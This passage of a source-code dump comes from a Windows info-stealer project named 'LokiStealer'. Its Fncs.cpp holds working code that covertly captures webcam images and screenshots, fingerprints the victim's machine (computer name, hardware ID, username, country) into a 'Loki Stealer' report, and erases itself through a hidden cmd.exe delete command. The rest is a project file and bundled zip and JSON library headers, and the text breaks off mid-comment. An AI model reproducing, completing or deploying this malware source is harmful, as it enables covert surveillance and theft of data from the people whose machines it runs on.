| ((cur[1] & 0xF0) >> 4)]; 114 | p[2] = (BYTE)(len > 1 ? cb64[((cur[1] & 0x0F) << 2) | ((cur[2] & 0xC0) >> 6)] : '.');//. = = 115 | p[3] = (BYTE)(len > 2 ? cb64[cur[2] & 0x3F] : '.');//. = = 116 | 117 | p += 4; 118 | } 119 | 120 | *p = 0; 121 | if (destSize)*destSize = (SIZE_T)(p - dest); 122 | } 123 | 124 | return (LPSTR)dest; 125 | } 126 | 127 | void __cpuid(uint32_t CPUInfo[4], int InfoType) 128 | { 129 | __asm 130 | { 131 | mov esi, CPUInfo 132 | mov eax, InfoType 133 | xor ecx, ecx 134 | cpuid 135 | mov dword ptr[esi + 0], eax 136 | mov dword ptr[esi + 4], ebx 137 | mov dword ptr[esi + 8], ecx 138 | mov dword ptr[esi + 12], edx 139 | } 140 | } 141 | 142 | LPCSTR genHwid() { 143 | uint32_t CPUInfo[4]; 144 | unsigned char mac[8] = { 0x1, 0x2, 0x1, 0x2, 0x1, 0x2, 0x1, 0x2 }; 145 | 146 | __cpuid(CPUInfo, 0); 147 | IP_ADAPTER_INFO AdapterInfo[16]; 148 | DWORD dwBufLen = sizeof(AdapterInfo); 149 | DWORD dwStatus = GetAdaptersInfo(AdapterInfo, &dwBufLen); 150 | PIP_ADAPTER_INFO pAdapterInfo = AdapterInfo; 151 | do 152 | { 153 | for (int i = 0; i < 8; i++) mac[i] = mac[i] + pAdapterInfo->Address[i]; 154 | pAdapterInfo = pAdapterInfo->Next; 155 | } while (pAdapterInfo); 156 | 157 | char* hwid = (char*)_alloc(100); 158 | wnsprintfA(hwid, 100, 
"%x%x%x%x%x%x%x%x%x%x%x%x", 159 | CPUInfo[0], CPUInfo[1], CPUInfo[2], 160 | CPUInfo[3], mac[0], mac[1], 161 | mac[2], mac[3], mac[4], 162 | mac[5], mac[6], mac[7]); 163 | 164 | return hwid; 165 | } -------------------------------------------------------------------------------- /Source/LokiStealer/LokiStealer.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {56647c63-4e31-4ab6-8c1a-6819a7a7c698} 25 | LokiStealer 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | true 77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 78 | true 79 | 80 | 81 | Console 82 | true 83 | 84 | 85 | 86 | 87 | Level3 88 | true 89 | true 90 | true 91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Windows 96 | true 97 | true 98 | true 99 | 100 | 101 | 102 | 103 | Level3 104 | true 105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Console 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | true 118 | true 119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | true 121 | 122 | 123 | Console 124 | true 125 | true 126 | true 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | -------------------------------------------------------------------------------- /Source/LokiStealer/Fncs.cpp: 
-------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "fncs.h" 7 | #include "mem.h" 8 | 9 | #pragma comment(lib, "Vfw32.lib") 10 | 11 | #define capSendMessage(hWnd, uMsg, wParm, lParam) ((IsWindow(hWnd)) ? SendMessageW(hWnd, uMsg, (WPARAM)(wParm), (LPARAM)(lParam)) : 0) 12 | 13 | BOOL capWebCam(WCHAR* szFile, int nIndex, int nX, int nY, int nMsg) 14 | { 15 | HWND hWndCap = capCreateCaptureWindowW(L"CapWebCam", WS_CHILD, 0, 0, nX, nY, GetDesktopWindow(), 0); 16 | if (!hWndCap) return FALSE; 17 | 18 | if (!capSendMessage(hWndCap, WM_CAP_DRIVER_CONNECT, nIndex, 0)) { 19 | DestroyWindow(hWndCap); return FALSE; 20 | } 21 | 22 | CAPDRIVERCAPS capDriverCaps; 23 | memset(&capDriverCaps, 0, sizeof(CAPDRIVERCAPS)); 24 | capSendMessage(hWndCap, WM_CAP_DRIVER_GET_CAPS, sizeof(CAPDRIVERCAPS), &capDriverCaps); 25 | if (!capDriverCaps.fCaptureInitialized) { 26 | DestroyWindow(hWndCap); return FALSE; 27 | } 28 | 29 | capSendMessage(hWndCap, WM_CAP_SET_SCALE, TRUE, 0); 30 | capSendMessage(hWndCap, WM_CAP_GRAB_FRAME_NOSTOP, 0, 0); 31 | capSendMessage(hWndCap, WM_CAP_FILE_SAVEDIBW, 0, szFile); 32 | capSendMessage(hWndCap, WM_CAP_DRIVER_DISCONNECT, 0, 0); 33 | DestroyWindow(hWndCap); 34 | 35 | return TRUE; 36 | } 37 | 38 | int GetCamIndex() 39 | { 40 | char szDeviceName[80]; 41 | char szDeviceVersion[80]; 42 | 43 | for (int wIndex = 0; wIndex < 9; wIndex++) 44 | { 45 | if (capGetDriverDescriptionA(wIndex, szDeviceName, sizeof(szDeviceName), 46 | szDeviceVersion, sizeof(szDeviceVersion))) 47 | return wIndex; 48 | } 49 | return -1; 50 | } 51 | 52 | void captureCam(WCHAR* szPath) { 53 | int nIndex = GetCamIndex(); 54 | if (nIndex == -1) 55 | return; 56 | 57 | capWebCam(szPath, nIndex, 640, 480, 10); 58 | } 59 | 60 | LPCSTR genCountry() { 61 | GEOID myGEO = GetUserGeoID(GEOCLASS_NATION); 62 | int sizeOfBuffer = GetGeoInfoA(myGEO, GEO_ISO2, NULL, 0, 0); 63 | 64 | CHAR* geo = 
(CHAR*)_alloc(sizeOfBuffer + 1); 65 | 66 | _set(geo, 0, sizeOfBuffer + 1); 67 | GetGeoInfoA(myGEO, GEO_ISO2, geo, sizeOfBuffer, 0); 68 | 69 | return geo; 70 | } 71 | 72 | void randomInt(SIZE_T* out, int from, int to) { 73 | HCRYPTPROV prov; 74 | BYTE pbData[2]; 75 | 76 | if (CryptAcquireContextA(&prov, NULL, 0, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) 77 | { 78 | if (CryptGenRandom(prov, 2, pbData)) 79 | { 80 | *out = (from + (((int)pbData[0] ^ (int)pbData[1]) % (to - from))); 81 | 82 | if (CryptReleaseContext(prov, 0)) 83 | return; 84 | } 85 | else { 86 | _free(pbData); 87 | if (CryptReleaseContext(prov, 0)) 88 | return; 89 | } 90 | } 91 | else { 92 | _free(pbData); 93 | } 94 | } 95 | 96 | void CryptGenKey(BYTE** data) { 97 | HCRYPTPROV prov; 98 | BYTE* pbData = (BYTE*)_alloc(256); 99 | 100 | if (CryptAcquireContextA(&prov, NULL, 0, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) 101 | { 102 | if (CryptGenRandom(prov, 256, pbData)) 103 | { 104 | *data = pbData; 105 | 106 | if (CryptReleaseContext(prov, 0)) 107 | return; 108 | } 109 | else { 110 | _free(pbData); 111 | if (CryptReleaseContext(prov, 0)) 112 | return; 113 | } 114 | } 115 | else { 116 | _free(pbData); 117 | } 118 | } 119 | 120 | void selfDestruct() 121 | { 122 | WCHAR* szModuleName = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 123 | WCHAR* szCmd = (WCHAR*)_alloc((MAX_PATH * 2) * sizeof(WCHAR)); 124 | STARTUPINFO si = { 0 }; 125 | PROCESS_INFORMATION pi = { 0 }; 126 | 127 | GetModuleFileNameW(NULL, szModuleName, MAX_PATH); 128 | wnsprintfW(szCmd, MAX_PATH, L"cmd.exe /C ping 1.1.1.1 -n 3 -w 3000 > Nul & Del /f /q \"%s\"", szModuleName); 129 | CreateProcessW(NULL, szCmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); 130 | _free(szModuleName); 131 | _free(szCmd); 132 | 133 | CloseHandle(pi.hThread); 134 | CloseHandle(pi.hProcess); 135 | ExitProcess(0); 136 | } 137 | 138 | LPCWSTR getSystemInfoW() { 139 | HW_PROFILE_INFOW hw; 140 | GEOID myGEO = GetUserGeoID(GEOCLASS_NATION); 141 | int sizeOfBuffer = 
GetGeoInfoW(myGEO, GEO_ISO2, NULL, 0, 0); 142 | DWORD size = MAX_PATH; 143 | 144 | WCHAR* computername = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 145 | WCHAR* hwid = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 146 | WCHAR* username = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 147 | WCHAR* geo = (WCHAR*)_alloc((sizeOfBuffer + 1) * sizeof(WCHAR)); 148 | 149 | memset(geo, 0, (sizeOfBuffer + 1) * sizeof(WCHAR)); 150 | GetComputerNameW(computername, &size); 151 | GetCurrentHwProfileW(&hw); 152 | lstrcpyW(hwid, hw.szHwProfileGuid); 153 | GetEnvironmentVariableW(L"USERNAME", username, MAX_PATH); 154 | GetGeoInfoW(myGEO, GEO_ISO2, geo, sizeOfBuffer, 0); 155 | 156 | if (computername && hwid && username && geo) { 157 | WCHAR* info = (WCHAR*)_alloc(512 * sizeof(WCHAR)); 158 | 159 | wnsprintfW(info, 512, 160 | L"Loki Stealer\r\n" 161 | L"\r\n" 162 | L"Computer Name: %s\r\n" 163 | L"\r\n" 164 | L"Hardware id: %s\r\n" 165 | L"\r\n" 166 | L"User name: %s\r\n" 167 | L"\r\n" 168 | L"Computer country: %s\r\n" 169 | L"\r\n", 170 | computername, hwid, username, geo 171 | ); 172 | 173 | _free(computername); 174 | _free(hwid); 175 | _free(username); 176 | _free(geo); 177 | 178 | return info; 179 | } 180 | 181 | _free(computername); 182 | _free(hwid); 183 | _free(username); 184 | _free(geo); 185 | 186 | return 0; 187 | } 188 | 189 | CHAR* randKey() { 190 | const CHAR ALPH[] = { 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H' }; 191 | int min = 0; 192 | int max = _countof(ALPH); 193 | int rand; 194 | CHAR* mem = (CHAR*)_alloc(5); 195 | 196 | rand = min + ((0xCC * GetTickCount()) % max); 197 | mem[0] = ALPH[rand]; 198 | rand = min + ((0xAD * GetTickCount()) % max); 199 | mem[1] = ALPH[rand]; 200 | rand = min + ((0xDD * GetTickCount()) % max); 201 | mem[2] = ALPH[rand]; 202 | rand = min + ((0xEA * GetTickCount()) % max); 203 | mem[3] = ALPH[rand]; 204 | mem[4] = 0; 205 | 206 | return mem; 207 | } 208 | 209 | BOOL pathExists(LPCWSTR path, BOOL isFile) { 210 | if (isFile) { 211 | DWORD dwAttrib = 
GetFileAttributesW(path); 212 | 213 | return (dwAttrib != INVALID_FILE_ATTRIBUTES && 214 | !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); 215 | } 216 | else { 217 | DWORD attribs = ::GetFileAttributesW(path); 218 | if (attribs == INVALID_FILE_ATTRIBUTES) { 219 | return false; 220 | } 221 | return (attribs & FILE_ATTRIBUTE_DIRECTORY); 222 | } 223 | } 224 | 225 | LPCWSTR resolveEnvrimoment(const WCHAR* env) { 226 | WCHAR* mem = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 227 | GetEnvironmentVariableW(env, mem, 260); 228 | return mem; 229 | } 230 | 231 | int captureScreenshot(LPCWSTR szFile) 232 | { 233 | HDC hdcScr, hdcMem; 234 | HBITMAP hbmScr; 235 | BITMAP bmp; 236 | int iXRes, iYRes; 237 | 238 | hdcScr = CreateDCA("DISPLAY", NULL, NULL, NULL); 239 | hdcMem = CreateCompatibleDC(hdcScr); 240 | iXRes = GetDeviceCaps(hdcScr, HORZRES); 241 | iYRes = GetDeviceCaps(hdcScr, VERTRES); 242 | hbmScr = CreateCompatibleBitmap(hdcScr, iXRes, iYRes); 243 | if (hbmScr == 0) return 0; 244 | if (!SelectObject(hdcMem, hbmScr)) return 0; 245 | if (!StretchBlt(hdcMem, 246 | 0, 0, iXRes, iYRes, 247 | hdcScr, 248 | 0, 0, iXRes, iYRes, 249 | SRCCOPY)) 250 | 251 | return 0; 252 | 253 | PBITMAPINFO pbmi; 254 | WORD cClrBits; 255 | 256 | if (!GetObjectW(hbmScr, sizeof(BITMAP), (LPSTR)&bmp)) return 0; 257 | 258 | cClrBits = (WORD)(bmp.bmPlanes * bmp.bmBitsPixel); 259 | if (cClrBits == 1) 260 | cClrBits = 1; 261 | else if (cClrBits <= 4) 262 | cClrBits = 4; 263 | else if (cClrBits <= 8) 264 | cClrBits = 8; 265 | else if (cClrBits <= 16) 266 | cClrBits = 16; 267 | else if (cClrBits <= 24) 268 | cClrBits = 24; 269 | else cClrBits = 32; 270 | if (cClrBits != 24) 271 | pbmi = (PBITMAPINFO)LocalAlloc(LPTR, 272 | sizeof(BITMAPINFOHEADER) + 273 | sizeof(RGBQUAD) * (1 << cClrBits)); 274 | 275 | else 276 | pbmi = (PBITMAPINFO)LocalAlloc(LPTR, 277 | sizeof(BITMAPINFOHEADER)); 278 | 279 | pbmi->bmiHeader.biSize = sizeof(BITMAPINFOHEADER); 280 | pbmi->bmiHeader.biWidth = bmp.bmWidth; 281 | 
pbmi->bmiHeader.biHeight = bmp.bmHeight; 282 | pbmi->bmiHeader.biPlanes = bmp.bmPlanes; 283 | pbmi->bmiHeader.biBitCount = bmp.bmBitsPixel; 284 | if (cClrBits < 24) 285 | pbmi->bmiHeader.biClrUsed = (1 << cClrBits); 286 | 287 | pbmi->bmiHeader.biCompression = BI_RGB; 288 | pbmi->bmiHeader.biSizeImage = (pbmi->bmiHeader.biWidth + 7) / 8 289 | * pbmi->bmiHeader.biHeight * cClrBits; 290 | pbmi->bmiHeader.biClrImportant = 0; 291 | 292 | HANDLE hf; 293 | BITMAPFILEHEADER hdr; 294 | PBITMAPINFOHEADER pbih; 295 | LPBYTE lpBits; 296 | DWORD dwTotal; 297 | DWORD cb; 298 | BYTE *hp; 299 | DWORD dwTmp; 300 | 301 | pbih = (PBITMAPINFOHEADER)pbmi; 302 | lpBits = (LPBYTE)GlobalAlloc(GMEM_FIXED, pbih->biSizeImage); 303 | 304 | if (!lpBits) return 0; 305 | if (!GetDIBits(hdcMem, hbmScr, 0, (WORD)pbih->biHeight, lpBits, pbmi, DIB_RGB_COLORS)) return 0; 306 | hf = CreateFileW(szFile, 307 | GENERIC_READ | GENERIC_WRITE, 308 | (DWORD)0, 309 | NULL, 310 | CREATE_ALWAYS, 311 | FILE_ATTRIBUTE_NORMAL, 312 | (HANDLE)NULL); 313 | if (hf == INVALID_HANDLE_VALUE) return 0; 314 | 315 | hdr.bfType = 0x4d42; 316 | 317 | hdr.bfSize = (DWORD)(sizeof(BITMAPFILEHEADER) + 318 | pbih->biSize + pbih->biClrUsed * 319 | sizeof(RGBQUAD) + pbih->biSizeImage); 320 | hdr.bfReserved1 = 0; 321 | hdr.bfReserved2 = 0; 322 | hdr.bfOffBits = (DWORD) sizeof(BITMAPFILEHEADER) + 323 | pbih->biSize + pbih->biClrUsed * 324 | sizeof(RGBQUAD); 325 | 326 | if (!WriteFile(hf, (LPVOID)&hdr, sizeof(BITMAPFILEHEADER), (LPDWORD)&dwTmp, NULL)) return 0; 327 | 328 | if (!WriteFile(hf, (LPVOID)pbih, sizeof(BITMAPINFOHEADER) 329 | + pbih->biClrUsed * sizeof(RGBQUAD), 330 | (LPDWORD)&dwTmp, NULL)) 331 | return 0; 332 | 333 | dwTotal = cb = pbih->biSizeImage; 334 | hp = lpBits; 335 | if (!WriteFile(hf, (LPSTR)hp, (int)cb, (LPDWORD)&dwTmp, NULL)) return 0; 336 | 337 | if (!CloseHandle(hf)) return 0; 338 | 339 | GlobalFree((HGLOBAL)lpBits); 340 | ReleaseDC(0, hdcScr); 341 | ReleaseDC(0, hdcMem); 342 | 343 | return 1; 344 | } 
-------------------------------------------------------------------------------- /Source/LokiStealer/zip.h: -------------------------------------------------------------------------------- 1 | #ifndef _zip_H 2 | #define _zip_H 3 | 4 | 5 | // ZIP functions -- for creating zip files 6 | // This file is a repackaged form of the Info-Zip source code available 7 | // at www.info-zip.org. The original copyright notice may be found in 8 | // zip.cpp. The repackaging was done by Lucian Wischik to simplify and 9 | // extend its use in Windows/C++. Also to add encryption and unicode. 10 | 11 | 12 | #ifndef _unzip_H 13 | DECLARE_HANDLE(HZIP); 14 | #endif 15 | // An HZIP identifies a zip file that is being created 16 | 17 | typedef DWORD ZRESULT; 18 | // return codes from any of the zip functions. Listed later. 19 | 20 | 21 | 22 | HZIP CreateZip(const TCHAR *fn, const char *password); 23 | HZIP CreateZip(void *buf,unsigned int len, const char *password); 24 | HZIP CreateZipHandle(HANDLE h, const char *password); 25 | // CreateZip - call this to start the creation of a zip file. 26 | // As the zip is being created, it will be stored somewhere: 27 | // to a pipe: CreateZipHandle(hpipe_write); 28 | // in a file (by handle): CreateZipHandle(hfile); 29 | // in a file (by name): CreateZip("c:\\test.zip"); 30 | // in memory: CreateZip(buf, len); 31 | // or in pagefile memory: CreateZip(0, len); 32 | // The final case stores it in memory backed by the system paging file, 33 | // where the zip may not exceed len bytes. This is a bit friendlier than 34 | // allocating memory with new[]: it won't lead to fragmentation, and the 35 | // memory won't be touched unless needed. That means you can give very 36 | // large estimates of the maximum-size without too much worry. 37 | // As for the password, it lets you encrypt every file in the archive. 38 | // (This api doesn't support per-file encryption.) 
39 | // Note: because pipes don't allow random access, the structure of a zipfile 40 | // created into a pipe is slightly different from that created into a file 41 | // or memory. In particular, the compressed-size of the item cannot be 42 | // stored in the zipfile until after the item itself. (Also, for an item added 43 | // itself via a pipe, the uncompressed-size might not either be known until 44 | // after.) This is not normally a problem. But if you try to unzip via a pipe 45 | // as well, then the unzipper will not know these things about the item until 46 | // after it has been unzipped. Therefore: for unzippers which don't just write 47 | // each item to disk or to a pipe, but instead pre-allocate memory space into 48 | // which to unzip them, then either you have to create the zip not to a pipe, 49 | // or you have to add items not from a pipe, or at least when adding items 50 | // from a pipe you have to specify the length. 51 | // Note: for windows-ce, you cannot close the handle until after CloseZip. 52 | // but for real windows, the zip makes its own copy of your handle, so you 53 | // can close yours anytime. 54 | 55 | 56 | ZRESULT ZipAdd(HZIP hz,const TCHAR *dstzn, const TCHAR *fn); 57 | ZRESULT ZipAdd(HZIP hz,const TCHAR *dstzn, void *src,unsigned int len); 58 | ZRESULT ZipAddHandle(HZIP hz,const TCHAR *dstzn, HANDLE h); 59 | ZRESULT ZipAddHandle(HZIP hz,const TCHAR *dstzn, HANDLE h, unsigned int len); 60 | ZRESULT ZipAddFolder(HZIP hz,const TCHAR *dstzn); 61 | // ZipAdd - call this for each file to be added to the zip. 62 | // dstzn is the name that the file will be stored as in the zip file. 
63 | // The file to be added to the zip can come 64 | // from a pipe: ZipAddHandle(hz,"file.dat", hpipe_read); 65 | // from a file: ZipAddHandle(hz,"file.dat", hfile); 66 | // from a filen: ZipAdd(hz,"file.dat", "c:\\docs\\origfile.dat"); 67 | // from memory: ZipAdd(hz,"subdir\\file.dat", buf,len); 68 | // (folder): ZipAddFolder(hz,"subdir"); 69 | // Note: if adding an item from a pipe, and if also creating the zip file itself 70 | // to a pipe, then you might wish to pass a non-zero length to the ZipAddHandle 71 | // function. This will let the zipfile store the item's size ahead of the 72 | // compressed item itself, which in turn makes it easier when unzipping the 73 | // zipfile from a pipe. 74 | 75 | ZRESULT ZipGetMemory(HZIP hz, void **buf, unsigned long *len); 76 | // ZipGetMemory - If the zip was created in memory, via ZipCreate(0,len), 77 | // then this function will return information about that memory block. 78 | // buf will receive a pointer to its start, and len its length. 79 | // Note: you can't add any more after calling this. 80 | 81 | ZRESULT CloseZip(HZIP hz); 82 | // CloseZip - the zip handle must be closed with this function. 83 | 84 | unsigned int FormatZipMessage(ZRESULT code, TCHAR *buf,unsigned int len); 85 | // FormatZipMessage - given an error code, formats it as a string. 86 | // It returns the length of the error message. If buf/len points 87 | // to a real buffer, then it also writes as much as possible into there. 88 | 89 | 90 | 91 | // These are the result codes: 92 | #define ZR_OK 0x00000000 // nb. the pseudo-code zr-recent is never returned, 93 | #define ZR_RECENT 0x00000001 // but can be passed to FormatZipMessage. 94 | // The following come from general system stuff (e.g. 
files not openable) 95 | #define ZR_GENMASK 0x0000FF00 96 | #define ZR_NODUPH 0x00000100 // couldn't duplicate the handle 97 | #define ZR_NOFILE 0x00000200 // couldn't create/open the file 98 | #define ZR_NOALLOC 0x00000300 // failed to allocate some resource 99 | #define ZR_WRITE 0x00000400 // a general error writing to the file 100 | #define ZR_NOTFOUND 0x00000500 // couldn't find that file in the zip 101 | #define ZR_MORE 0x00000600 // there's still more data to be unzipped 102 | #define ZR_CORRUPT 0x00000700 // the zipfile is corrupt or not a zipfile 103 | #define ZR_READ 0x00000800 // a general error reading the file 104 | // The following come from mistakes on the part of the caller 105 | #define ZR_CALLERMASK 0x00FF0000 106 | #define ZR_ARGS 0x00010000 // general mistake with the arguments 107 | #define ZR_NOTMMAP 0x00020000 // tried to ZipGetMemory, but that only works on mmap zipfiles, which yours wasn't 108 | #define ZR_MEMSIZE 0x00030000 // the memory size is too small 109 | #define ZR_FAILED 0x00040000 // the thing was already failed when you called this function 110 | #define ZR_ENDED 0x00050000 // the zip creation has already been closed 111 | #define ZR_MISSIZE 0x00060000 // the indicated input file size turned out mistaken 112 | #define ZR_PARTIALUNZ 0x00070000 // the file had already been partially unzipped 113 | #define ZR_ZMODE 0x00080000 // tried to mix creating/opening a zip 114 | // The following come from bugs within the zip library itself 115 | #define ZR_BUGMASK 0xFF000000 116 | #define ZR_NOTINITED 0x01000000 // initialisation didn't work 117 | #define ZR_SEEK 0x02000000 // trying to seek in an unseekable file 118 | #define ZR_NOCHANGE 0x04000000 // changed its mind on storage, but not allowed 119 | #define ZR_FLATE 0x05000000 // an internal error in the de/inflation code 120 | 121 | 122 | 123 | 124 | 125 | 126 | // e.g. 
127 | // 128 | // (1) Traditional use, creating a zipfile from existing files 129 | // HZIP hz = CreateZip("c:\\simple1.zip",0); 130 | // ZipAdd(hz,"znsimple.bmp", "c:\\simple.bmp"); 131 | // ZipAdd(hz,"znsimple.txt", "c:\\simple.txt"); 132 | // CloseZip(hz); 133 | // 134 | // (2) Memory use, creating an auto-allocated mem-based zip file from various sources 135 | // HZIP hz = CreateZip(0,100000, 0); 136 | // // adding a conventional file... 137 | // ZipAdd(hz,"src1.txt", "c:\\src1.txt"); 138 | // // adding something from memory... 139 | // char buf[1000]; for (int i=0; i<1000; i++) buf[i]=(char)(i&0x7F); 140 | // ZipAdd(hz,"file.dat", buf,1000); 141 | // // adding something from a pipe... 142 | // HANDLE hread,hwrite; CreatePipe(&hread,&hwrite,NULL,0); 143 | // HANDLE hthread = CreateThread(0,0,ThreadFunc,(void*)hwrite,0,0); 144 | // ZipAdd(hz,"unz3.dat", hread,1000); // the '1000' is optional. 145 | // WaitForSingleObject(hthread,INFINITE); 146 | // CloseHandle(hthread); CloseHandle(hread); 147 | // ... meanwhile DWORD WINAPI ThreadFunc(void *dat) 148 | // { HANDLE hwrite = (HANDLE)dat; 149 | // char buf[1000]={17}; 150 | // DWORD writ; WriteFile(hwrite,buf,1000,&writ,NULL); 151 | // CloseHandle(hwrite); 152 | // return 0; 153 | // } 154 | // // and now that the zip is created, let's do something with it: 155 | // void *zbuf; unsigned long zlen; ZipGetMemory(hz,&zbuf,&zlen); 156 | // HANDLE hfz = CreateFile("test2.zip",GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); 157 | // DWORD writ; WriteFile(hfz,zbuf,zlen,&writ,NULL); 158 | // CloseHandle(hfz); 159 | // CloseZip(hz); 160 | // 161 | // (3) Handle use, for file handles and pipes 162 | // HANDLE hzread,hzwrite; CreatePipe(&hzread,&hzwrite,0,0); 163 | // HANDLE hthread = CreateThread(0,0,ZipReceiverThread,(void*)hzread,0,0); 164 | // HZIP hz = CreateZipHandle(hzwrite,0); 165 | // // ... 
add to it 166 | // CloseZip(hz); 167 | // CloseHandle(hzwrite); 168 | // WaitForSingleObject(hthread,INFINITE); 169 | // CloseHandle(hthread); 170 | // ... meanwhile DWORD WINAPI ZipReceiverThread(void *dat) 171 | // { HANDLE hread = (HANDLE)dat; 172 | // char buf[1000]; 173 | // while (true) 174 | // { DWORD red; ReadFile(hread,buf,1000,&red,NULL); 175 | // // ... and do something with this zip data we're receiving 176 | // if (red==0) break; 177 | // } 178 | // CloseHandle(hread); 179 | // return 0; 180 | // } 181 | 182 | 183 | 184 | // Now we indulge in a little skullduggery so that the code works whether 185 | // the user has included just zip or both zip and unzip. 186 | // Idea: if header files for both zip and unzip are present, then presumably 187 | // the cpp files for zip and unzip are both present, so we will call 188 | // one or the other of them based on a dynamic choice. If the header file 189 | // for only one is present, then we will bind to that particular one. 190 | ZRESULT CloseZipZ(HZIP hz); 191 | unsigned int FormatZipMessageZ(ZRESULT code, char *buf,unsigned int len); 192 | bool IsZipHandleZ(HZIP hz); 193 | #ifdef _unzip_H 194 | #undef CloseZip 195 | #define CloseZip(hz) (IsZipHandleZ(hz)?CloseZipZ(hz):CloseZipU(hz)) 196 | #else 197 | #define CloseZip CloseZipZ 198 | #define FormatZipMessage FormatZipMessageZ 199 | #endif 200 | 201 | 202 | 203 | #endif 204 | -------------------------------------------------------------------------------- /Source/LokiStealer/parson.h: -------------------------------------------------------------------------------- 1 | /* 2 | Parson ( http://kgabis.github.com/parson/ ) 3 | Copyright (c) 2012 - 2017 Krzysztof Gabis 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, 
sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in 13 | all copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN 21 | THE SOFTWARE. 22 | */ 23 | 24 | #ifndef parson_parson_h 25 | #define parson_parson_h 26 | 27 | #ifdef __cplusplus 28 | extern "C" 29 | { 30 | #endif 31 | 32 | #include /* size_t */ 33 | 34 | /* Types and enums */ 35 | typedef struct json_object_t JSON_Object; 36 | typedef struct json_array_t JSON_Array; 37 | typedef struct json_value_t JSON_Value; 38 | 39 | enum json_value_type { 40 | JSONError = -1, 41 | JSONNull = 1, 42 | JSONString = 2, 43 | JSONNumber = 3, 44 | JSONObject = 4, 45 | JSONArray = 5, 46 | JSONBoolean = 6 47 | }; 48 | typedef int JSON_Value_Type; 49 | 50 | enum json_result_t { 51 | JSONSuccess = 0, 52 | JSONFailure = -1 53 | }; 54 | typedef int JSON_Status; 55 | 56 | typedef void * (*JSON_Malloc_Function)(size_t); 57 | typedef void (*JSON_Free_Function)(void *); 58 | 59 | /* Call only once, before calling any other function from parson API. If not called, malloc and free 60 | from stdlib will be used for all allocations */ 61 | void json_set_allocation_functions(JSON_Malloc_Function malloc_fun, JSON_Free_Function free_fun); 62 | 63 | /* Sets if slashes should be escaped or not when serializing JSON. By default slashes are escaped. 
64 | This function sets a global setting and is not thread safe. */ 65 | void json_set_escape_slashes(int escape_slashes); 66 | 67 | /* Parses first JSON value in a file, returns NULL in case of error */ 68 | JSON_Value * json_parse_file(const char *filename); 69 | 70 | /* Parses first JSON value in a file and ignores comments (/ * * / and //), 71 | returns NULL in case of error */ 72 | JSON_Value * json_parse_file_with_comments(const char *filename); 73 | 74 | /* Parses first JSON value in a string, returns NULL in case of error */ 75 | JSON_Value * json_parse_string(const char *string); 76 | 77 | /* Parses first JSON value in a string and ignores comments (/ * * / and //), 78 | returns NULL in case of error */ 79 | JSON_Value * json_parse_string_with_comments(const char *string); 80 | 81 | /* Serialization */ 82 | size_t json_serialization_size(const JSON_Value *value); /* returns 0 on fail */ 83 | JSON_Status json_serialize_to_buffer(const JSON_Value *value, char *buf, size_t buf_size_in_bytes); 84 | JSON_Status json_serialize_to_file(const JSON_Value *value, const char *filename); 85 | char * json_serialize_to_string(const JSON_Value *value); 86 | 87 | /* Pretty serialization */ 88 | size_t json_serialization_size_pretty(const JSON_Value *value); /* returns 0 on fail */ 89 | JSON_Status json_serialize_to_buffer_pretty(const JSON_Value *value, char *buf, size_t buf_size_in_bytes); 90 | JSON_Status json_serialize_to_file_pretty(const JSON_Value *value, const char *filename); 91 | char * json_serialize_to_string_pretty(const JSON_Value *value); 92 | 93 | void json_free_serialized_string(char *string); /* frees string from 